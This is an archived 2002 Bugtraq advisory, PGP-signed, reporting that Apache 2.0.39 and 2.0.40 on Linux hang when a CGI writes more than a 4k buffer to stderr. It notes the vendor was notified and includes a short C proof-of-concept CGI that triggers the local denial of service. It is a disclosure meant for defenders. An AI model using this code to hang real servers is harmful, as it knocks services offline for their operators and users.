76512 2002-09-24  20:46  /82 rader/  <shaddup@hush.com>
Importerad: 2002-09-24  20:46  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <1655>
Ärende: Apache 2.0.(39|40) DOS (PHP!)
------------------------------------------------------------

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -=~=-_-=~=-_-=~=- I put PHP in the title so I know this message
will reach the "sekur1ty c0mmun1ty", that *knows* that PHP is bad,
because it's easy to write insecure applications, unlike C.
- -=~=-_-=~=-_-=~=-
Problem:
 o Apache 2.0 (.39 and .40 tested) on Linuxx0r (and possibly other OS's)
 will hang on a write to stderr that is larger than the default buffer
 size (4k on Linux)
Impact:
 o Local users can cause apache's httpd process to hang
 o Possible new DoS to look for in web apps that write
 user input to stderr!
Tested on:
 o Linux (RedHat)
 o FreeBSD (did not show a problem, but not well tested)
Notification:
 o The Apache Projekt was contacted July 9th, 2002
   (http://nagoya.apache.org/bugzilla/show_bug.cgi?id=10515)

- -=~=-_-=~=-_-=~=-
Sample Code
- -=~=-_-=~=-_-=~=-
// Credit to: K.C. Wong
#include <stdio.h>
#include <time.h>
#include <unistd.h>
#include <fcntl.h>

#define SIZE 4075

void out_err()
{
	char buffer[SIZE];
	int i = 0;

	for (i = 0; i < SIZE - 1; ++i)
		buffer[i] = 'a' + (char )(i % 26);

	buffer[SIZE - 1] = '\0';

//
fcntl(2, F_SETFL, fcntl(2, F_GETFL) | O_NONBLOCK);

	fprintf(stderr, "short test\n");
	fflush(stderr);

	fprintf(stderr, "test error=%s\n", buffer);
	fflush(stderr);
} // out_err()

int main(int argc, char ** argv)
{
	fprintf(stdout, "Context-Type: text/html\r\n");
	fprintf(stdout, "\r\n\r\n");
	out_err();
	fprintf(stdout, "<HTML>\n");
	fprintf(stdout, "<body>\n");
	fprintf(stdout, "<h1>hello world</h1>\n");
	fprintf(stdout, "</body>\n");
	fprintf(stdout, "</HTML>\n");
	fflush(stdout);
	exit(0);
} // main()


-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlgEARECABgFAj2Pa0MRHHNoYWRkdXBAaHVzaC5jb20ACgkQ8iAl114OGrxaHwCgsmGs
262aOmBHEUw01ktoAADRIz0AoJOdidtdbVswjjp0sqn1uHW+EQCT
=8PKT
-----END PGP SIGNATURE-----




Get your free encrypted email at https://www.hushmail.com
(76512) / <shaddup@hush.com>/-------------(Ombruten)